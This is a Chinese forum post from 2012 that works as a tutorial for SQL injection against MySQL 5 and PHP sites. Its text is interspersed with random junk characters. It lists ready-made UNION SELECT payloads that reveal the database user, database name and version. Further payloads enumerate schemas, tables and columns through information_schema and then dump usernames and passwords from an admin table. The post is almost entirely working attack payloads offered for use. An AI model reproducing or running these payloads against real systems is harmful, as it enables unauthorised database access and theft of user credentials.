, _* @- q1 c0 @7 a, y教程内容:Mysql 5+php 注入
$ F% I6 {) E% [- u1 n% K6 C3 I/ |( @# D" M0 d6 }2 X0 o
! y0 S+ m0 E( p- M& o
1 \* b$ `+ _1 a8 r4 n一.查看MYSQL基本信息(库名,版本,用户)
0 V5 ?, k- I( ^! z0 A) P3 j% m& Q. v; f( \ V' Y# T
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*0 c2 y+ U9 g/ u- o, E" K7 T- G1 E
' v! o* [+ f' X, _: F8 q二.查数据库
8 b7 X7 r' C6 M: R0 C7 F! L: }0 {/ w3 Y* m
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*1 v. X" n* k( N
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。! `2 A7 X5 c6 S3 E* H8 p
$ V( s _4 {/ b: C" t" v' ~- @
三.暴表 U: [% j, D. f8 }; h
, _; O/ a. s8 x4 j) h5 W
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
" w. S1 C, @. H0 K
4 [; q: f1 y1 f! l; M9 ]( c8 Vlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
1 k: Y2 d! K! |$ s3 r$ N( x
. \- [1 S! F% K i8 t/ o( G四.暴字段1 B- |+ O* F) i/ r- H7 |
6 r2 [2 w0 U( G8 a; n
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*9 \! ~3 r5 d/ E% F H$ @5 \
8 t" P- q# I, X p& ^0 olimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。) d4 B1 I. l5 \3 N8 y T! i) |9 m
" v8 @4 o. x' C& r. W五.暴数据0 K8 y9 s- [3 y3 s+ T
( C1 F+ h# Y- _& D
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*0 v' [) L5 D9 g; T
5 _; f4 [' K! ?. M5 `5 e! g
# A/ t* x) f/ z' C N0 }& q! r这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。9 G& _4 ]1 e/ ^2 }
|
发表于 2012-9-13 16:27:53
收藏
支持
反对